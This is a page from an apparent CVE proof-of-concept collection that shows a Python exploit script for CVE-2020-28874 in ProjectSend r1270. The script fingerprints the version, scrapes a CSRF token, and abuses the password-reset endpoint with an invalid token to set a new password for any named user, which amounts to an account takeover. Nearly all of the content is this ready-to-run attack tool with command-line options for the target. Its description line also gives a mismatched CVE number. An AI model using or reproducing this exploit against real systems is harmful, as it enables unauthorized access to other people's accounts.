4837 Total CVEs
26 Years
GitHub
Home / 2020 / CVE-2020-28874
README.md
Rendering markdown...
POC / CVE-2020-28874.py PY
⬇ Raw GitHub ✕ Close 
import requests
import argparse
import re

proxies = {"http":None,"https":None}


def check():
    session = requests.Session()
    r = session.get(url,proxies=proxies,verify=False)
    if (r.text.find('version r1270')> 0):
        print("The application is vulnerable")
    else:
        print("The application may not be vulnerable")

    return session

def getCSRFtoken(session):
    r = session.get(url,proxies=proxies,verify=False)
    m = re.search(" +name=\"csrf_token\" value=\"(.*?)\"",r.text)
    return m.group(1)

def exploit(session):
    target = url +"/reset-password.php?user={}&token=NotValid".format(user)
    csrfToken = getCSRFtoken(session)
    data = {"csrf_token":csrfToken,"form_type":"new_password","password":pwd}
    r = session.post(target,data=data,proxies=proxies,verify=False)

    if(r.text.find("Your new password has been set. You can now log in using it.")>0):
        print("Sucess!!")
    else:
        print("Fail!!!")

def main():
    parser = argparse.ArgumentParser(description='CVE-2020-2875: ProjectSend r1270 Privilage Escalation')
    parser.add_argument('--url',type=str,help='The url address of the ProjectSend app',required=True)
    parser.add_argument('--user',type=str,help='The user name target of the app',required=True)
    parser.add_argument('--pwd',type=str,help='The new password to set',required=True)
    parser.add_argument('--proxy',type=str,help="The proxy to be use in format IP:PORT By default None",required=False)

    args = parser.parse_args()
    global url
    global user
    global pwd
    global proxies

    url = args.url
    user = args.user
    pwd = args.pwd

    if args.proxy is not None:
        proxies={"http":"http://{}".format(args.proxy),"https":"https://{}".format(args.proxy)}

    regex = re.compile(
        r'^(?:http)s?://' # http:// or https://
        r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' #domain...
        r'localhost|' #localhost...
        r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
        r'(?::\d+)?' # optional port
        r'(?:/?|[/?]\S+)$', re.IGNORECASE)
    if (re.match(regex, url) is None):
        print("The provided url is not valid!")
        exit()

    session = check()
    exploit(session)

if __name__ == "__main__":
    main()